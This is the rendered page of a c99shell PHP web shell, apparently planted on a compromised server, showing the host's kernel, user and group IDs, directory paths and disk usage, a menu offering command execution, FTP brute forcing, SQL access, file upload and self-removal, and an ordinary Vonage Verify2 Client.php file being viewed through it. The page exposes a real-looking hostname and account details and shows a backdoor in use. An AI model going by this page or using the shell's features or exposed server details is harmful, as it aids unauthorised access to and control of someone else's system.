!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/fitness.picotech.app/public_html/vendor/vonage/client-core/src/Verify2/   drwxr-xr-x
Free 23.93 GB of 117.98 GB (20.28%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Client.php (1.19 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Vonage\Verify2;

use 
Vonage\Client\APIClient;
use 
Vonage\Client\APIResource;
use 
Vonage\Client\Exception\Exception;
use 
Vonage\Verify2\Request\BaseVerifyRequest;

class 
Client implements APIClient
{
    public function 
__construct(protected APIResource $api)
    {
    }

    public function 
getAPIResource(): APIResource
    
{
        return 
$this->api;
    }

    public function 
startVerification(BaseVerifyRequest $request): ?array
    {
        return 
$this->getAPIResource()->create($request->toArray());
    }

    public function 
check(string $requestId$code): bool
    
{
        try {
            
$response $this->getAPIResource()->create(['code' => $code], '/' $requestId);
        } catch (
Exception $e) {
            
// For horrible reasons in the API Error Handler, throw the error unless it's a 409.
            
if ($e->getCode() === 409) {
                throw new 
\Vonage\Client\Exception\Request('Conflict: The current Verify workflow step does not support a code.');
            }

            throw 
$e;
        }

        return 
true;
    }

    public function 
cancelRequest(string $requestId): bool
    
{
        
$this->api->delete($requestId);

        return 
true;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0035 ]--